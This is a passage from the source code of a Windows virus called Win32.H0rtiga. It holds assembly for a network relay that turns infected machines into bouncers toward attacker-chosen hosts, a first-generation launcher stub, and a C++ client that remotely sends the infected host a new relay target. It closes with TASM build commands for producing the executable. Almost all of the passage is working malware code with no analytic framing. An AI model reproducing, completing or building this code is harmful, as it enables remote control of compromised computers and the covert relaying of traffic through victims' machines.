        mov     byte ptr [ebp+countbouncer],20  ; relay this many (+1) sessions
bis:
        push    0
        push    0
        lea     esi,[ebp+sock1]
        lodsd
        push    eax
        call    dword ptr [ebp+ddaccept]
        mov     dword ptr [ebp+gotit],eax
        mov     dword ptr [ebp+fd_set1.sockh],eax
        push    6
        push    1
        push    2
        call    dword ptr [ebp+ddsocket]
        cmp     eax,-1
        je      error
        mov     dword ptr [ebp+sock2],eax
        mov     dword ptr [ebp+fd_set2.sockh],eax
        push    16
        lea     esi,[ebp+addr2]
        push    esi
        lea     esi,[ebp+sock2]
        lodsd
        push    eax
        call    dword ptr [ebp+ddconnect]       ; connect to the configured target
        cmp     eax,-1
        je      nosok2
main_lp:
        lea     esi,[ebp+ttl]
        push    esi                             ; timeout
        push    0
        push    0
        lea     esi,[ebp+fd_set1]
        push    esi                             ; readfds = client side
        push    10h
        call    dword ptr [ebp+ddselect]
        cmp     eax,-1
        je      outnow
        cmp     eax,1
        je      r1w2
        mov     dword ptr [ebp+fd_set1.no],1
        lea     esi,[ebp+ttl]
        push    esi
        push    0
        push    0
        lea     esi,[ebp+fd_set2]
        push    esi                             ; readfds = target side
        push    10h
        call    dword ptr [ebp+ddselect]
        cmp     eax,-1
        je      outnow
        cmp     eax,1
        je      r2w1
        mov     dword ptr [ebp+fd_set2.no],1
        jmp     main_lp
outnow:
        lea     esi,[ebp+sock2]
        lodsd
        push    eax
        call    dword ptr [ebp+ddclosesocket]
nosok2:
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddclosesocket]
        mov     al,byte ptr [ebp+countbouncer]
        test    al,al
        jz      byebounz
        dec     al
        mov     byte ptr [ebp+countbouncer],al
        jmp     bis
byebounz:
        mov     byte ptr [ebp+semaforo],0
        jmp     configit
r1w2:                                           ; client -> target
        push    0
        push    buffsz
        lea     esi,[ebp+adrbuff]
        lodsd
        push    eax
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddrecv]
        or      eax,eax
        jz      outnow
        cmp     eax,-1
        je      outnow
        push    0
        push    eax                             ; bytes received
        lea     esi,[ebp+adrbuff]
        lodsd
        push    eax
        lea     esi,[ebp+sock2]
        lodsd
        push    eax
        call    dword ptr [ebp+ddsend]
        cmp     eax,-1
        je      outnow
        jmp     main_lp
r2w1:                                           ; target -> client
        push    0
        push    buffsz
        lea     esi,[ebp+adrbuff]
        lodsd
        push    eax
        lea     esi,[ebp+sock2]
        lodsd
        push    eax
        call    dword ptr [ebp+ddrecv]
        or      eax,eax
        jz      outnow
        cmp     eax,-1
        je      outnow
        push    0
        push    eax
        lea     esi,[ebp+adrbuff]
        lodsd
        push    eax
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddsend]
        cmp     eax,-1
        je      outnow
        jmp     main_lp

virlenght       equ     $-start                 ; size of the virus body

; ------------------------------------------------------------
; First generation: compute the RVA of f_generation and run the virus
; ------------------------------------------------------------
zero_generation:
        mov     ebx,offset f_generation
        push    0
        call    GetModuleHandleA
        xchg    eax,ebx
        sub     eax,ebx                         ; VA - image base = RVA
        lea     edi,oldentrypointrva
        stosd
        jmp     start
f_generation:
        push    0
        push    offset m_sztitle
        push    offset m_szcopyright
        push    0
        call    MessageBoxA
        push    0
        call    ExitProcess

m_sztitle       db '-= code by |zan [1st generation] =-',0
m_szcopyright   db '-=[ (c) 2000. Win32.H0rtiga virus will run now... ]=-',0

end zero_generation

; ----------------------------------------------------------------------------
; Win32.h0rtiga - End virus code (W32H0RTIGA.ASM)
; ----------------------------------------------------------------------------

; ----------------------------------------------------------------------------
; Win32.h0rtiga - Begin client code (H0RTCLIENT.CPP / Visual C++ 6.0)
; ----------------------------------------------------------------------------

#include <iostream.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock2.h>

#define MAX_BANNER      500
#define ACCION_BOUNCE   1

typedef unsigned char  DB;
typedef unsigned short DW;
typedef unsigned long  DD;

// 8-byte record the server expects: action, (padding), port and IPv4
// address, both already in network byte order
typedef struct {
    DB accion;
    DW puertoremoto;
    DD direccion;
} CONF_REMOTA;

DD addrtmp;

void MostrarCreditos()
{
    cout << "(c) 2000 DeepZone - h0rtiga client (Win32)..." << endl
         << "Coded by |zan - izan@galaxycorp.com" << endl
         << "Usage: H0RTCLIENT <h0rtiga host> <port> <new host> <port>" << endl
         << "E.g.:  h0rtclient host.com 5556 www.pandasoftware.es 80" << endl;
    cout.flush();
}

void SetEstructura(CONF_REMOTA *cremota, DB acc, DD dire, DW premoto)
{
    cremota->accion = acc;
    cremota->direccion = dire;
    cremota->puertoremoto = premoto;
}

void main(int argc, char *argv[])
{
    SOCKET s;
    int i;
    char banner[MAX_BANNER];
    sockaddr_in a;
    hostent FAR *h = NULL;
    WSADATA wsadata;
    CONF_REMOTA conf_remota;

    // Show credits
    MostrarCreditos();

    // Num params?
    if (argc != 5) {
        cout << "Error: wrong number of parameters." << endl;
        exit(-1);
    }

    // Winsock up!!
    if (WSAStartup(0x101, &wsadata)) {
        cout << "Error: unable to initialise the Winsock library." << endl;
        exit(-1);
    }

    // Server's name (the infected machine)
    if (isalpha((int)*(argv[1]))) {
        h = gethostbyname(argv[1]);
        if (h == NULL) {
            cout << "Error: cannot resolve the host name." << endl;
            WSACleanup();
            exit(-1);
        }
        else
            memcpy(&(a.sin_addr.s_addr), h->h_addr, h->h_length);
    }
    else {
        if ((a.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
            cout << "Error: cannot resolve the host name." << endl;
            exit(-1);
        }
    }

    // Port?
    a.sin_family = AF_INET;
    a.sin_port = htons((DW)atoi(argv[2]));

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) {
        cout << "Error: cannot create the socket: " << WSAGetLastError() << endl;
        WSACleanup();
        exit(-1);
    }

    // Trying...
    if (connect(s, (struct sockaddr *)&a, sizeof(a))) {
        cout << "Error: cannot establish the connection: " << WSAGetLastError() << endl;
        WSACleanup();
        exit(-1);
    }

    // Clean banner (keeps it NUL-terminated whatever the server sends)
    for (i = 0; i < MAX_BANNER; i++)
        banner[i] = 0;

    cout << "Waiting for reply..." << endl;
    if (recv(s, (char *)&banner, sizeof(banner) - 1, 0) == SOCKET_ERROR)
        cout << "Error receiving data." << endl;
    else {
        cout << banner << endl;
    }

    // Target's name (where the infected machine will relay to)
    if (isalpha((int)*(argv[3]))) {
        h = gethostbyname(argv[3]);
        if (h == NULL) {
            cout << "Error: cannot resolve the remote host name." << endl;
            WSACleanup();
            exit(-1);
        }
        else
            memcpy(&addrtmp, h->h_addr, h->h_length);
    }
    else {
        if ((addrtmp = inet_addr(argv[3])) == INADDR_NONE) {
            cout << "Error: cannot resolve the remote host name." << endl;
            exit(-1);
        }
    }

    SetEstructura(&conf_remota, ACCION_BOUNCE, addrtmp, htons((DW)atoi(argv[4])));

    if ((send(s, (char *)&conf_remota, sizeof(conf_remota), 0)) == SOCKET_ERROR)
        cout << "Error sending data." << endl;
    else
        cout << "... new configuration sent." << endl;

    closesocket(s);

    // Winsock down!!
    WSACleanup();
}

; ----------------------------------------------------------------------------
; Win32.h0rtiga - End client code (H0RTCLIENT.CPP)
; ----------------------------------------------------------------------------

; ----------------------------------------------------------------------------
; Win32.h0rtiga - Compiling... (TASM 5.0 / x86)
; ----------------------------------------------------------------------------
;
;   tasm32 -ml w32h0rtiga.asm
;   tlink32 -Tpe -c -x w32h0rtiga.obj,,,import32
;   pewrsec.com w32h0rtiga.exe          ; makes the code section writable
;
;
; -] EOF